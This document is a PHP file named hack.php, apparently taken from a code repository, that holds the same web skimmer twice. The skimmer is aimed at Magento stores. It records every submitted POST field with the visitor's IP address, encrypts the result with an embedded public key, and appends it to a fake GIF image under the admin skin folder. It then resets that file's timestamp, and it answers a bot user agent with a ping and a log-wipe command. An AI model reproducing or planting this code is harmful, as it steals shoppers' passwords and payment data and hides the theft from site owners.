litzinger/hack.php

## hack.php
<?PHP
$y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif';
$m1 = '1355773528';
$k2 = 'pccbe60c';
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
    if (isset($_GET[$k2])) {
        $m1 = file_exists($y0)
            ? @filemtime($y0)
            : $m1;
        @file_put_contents($y0, '');
        @touch($y0, $m1, $m1);
        echo 'clean ok';
    } else {
        echo 'Pong';
    }
    exit;
}if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
    $i4 = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
    $i4 = @$_SERVER['REMOTE_ADDR'];
}if (isset($_POST) && sizeof($_POST)) {
    $a5 = '';
    foreach ($_POST as $h6 => $n7) {
        if (is_array($n7)) {
            foreach ($n7 as $f8 => $l9) {
                if (is_array($l9)) {
                    foreach ($l9 as $l10 => $v11) {
                        if (is_array($v11)) {
                            ;
                        } else {
                            $a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
                        }
                    }
                } else {
                    $a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9;
                }
            }
        } else {
            $a5 .= ':' . $h6 . '=' . $n7;
        }
    }
    $a5 = $i4 . $a5;
} else {
    $a5 = null;
}if ($a5) {
    $t12 = false;
    if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists(
            'openssl_encrypt'
        )
    ) {
        $t12 = true;
    } elseif (function_exists('dl')) {
        $n13 = strtolower(substr(php_uname(), 0, 3));
        $d14 = 'php_openssl.' . ($n13 == 'win'
                ? 'dll'
                : 'so');
        @dl($d14);
        if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists(
                'openssl_encrypt'
            )
        ) {
            $t12 = true;
        }
    }
    if ($t12) {
        $t15 = @openssl_get_publickey($k3);
        $q16 = 128;
        $t17 = '';
        $h18 = md5(md5(microtime()) . rand());
        $e19 = $h18;
        while ($e19) {
            $f20 = substr($e19, 0, $q16);
            $e19 = substr($e19, $q16);
            @openssl_public_encrypt($f20, $h21, $t15);
            $t17 .= $h21;
        }
        $t22 = @openssl_encrypt($a5, 'aes128', $h18);
        @openssl_free_key($t15);
        $a5 = $t17 . ':::SEP:::' . $t22;
    }
    $m1 = file_exists($y0)
        ? @filemtime($y0)
        : $m1;
    @file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND);
    @touch($y0, $m1, $m1);
}?>
	<?PHP
	$y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif';
	$m1 = '1355773528';
	$k2 = 'pccbe60c';
	$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
	if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
	if (isset($_GET[$k2])) {
	$m1 = file_exists($y0)
	? @filemtime($y0)
	: $m1;
	@file_put_contents($y0, '');
	@touch($y0, $m1, $m1);
	echo 'clean ok';
	} else {
	echo 'Pong';
	}
	exit;
	}if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
	$i4 = $_SERVER['HTTP_CLIENT_IP'];
	} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
	$i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
	} else {
	$i4 = @$_SERVER['REMOTE_ADDR'];
	}if (isset($_POST) && sizeof($_POST)) {
	$a5 = '';
	foreach ($_POST as $h6 => $n7) {
	if (is_array($n7)) {
	foreach ($n7 as $f8 => $l9) {
	if (is_array($l9)) {
	foreach ($l9 as $l10 => $v11) {
	if (is_array($v11)) {
	;
	} else {
	$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
	}
	}
	} else {
	$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9;
	}
	}
	} else {
	$a5 .= ':' . $h6 . '=' . $n7;
	}
	}
	$a5 = $i4 . $a5;
	} else {
	$a5 = null;
	}if ($a5) {
	$t12 = false;
	if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists(
	'openssl_encrypt'
	)
	) {
	$t12 = true;
	} elseif (function_exists('dl')) {
	$n13 = strtolower(substr(php_uname(), 0, 3));
	$d14 = 'php_openssl.' . ($n13 == 'win'
	? 'dll'
	: 'so');
	@dl($d14);
	if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists(
	'openssl_encrypt'
	)
	) {
	$t12 = true;
	}
	}
	if ($t12) {
	$t15 = @openssl_get_publickey($k3);
	$q16 = 128;
	$t17 = '';
	$h18 = md5(md5(microtime()) . rand());
	$e19 = $h18;
	while ($e19) {
	$f20 = substr($e19, 0, $q16);
	$e19 = substr($e19, $q16);
	@openssl_public_encrypt($f20, $h21, $t15);
	$t17 .= $h21;
	}
	$t22 = @openssl_encrypt($a5, 'aes128', $h18);
	@openssl_free_key($t15);
	$a5 = $t17 . ':::SEP:::' . $t22;
	}
	$m1 = file_exists($y0)
	? @filemtime($y0)
	: $m1;
	@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND);
	@touch($y0, $m1, $m1);
	}?>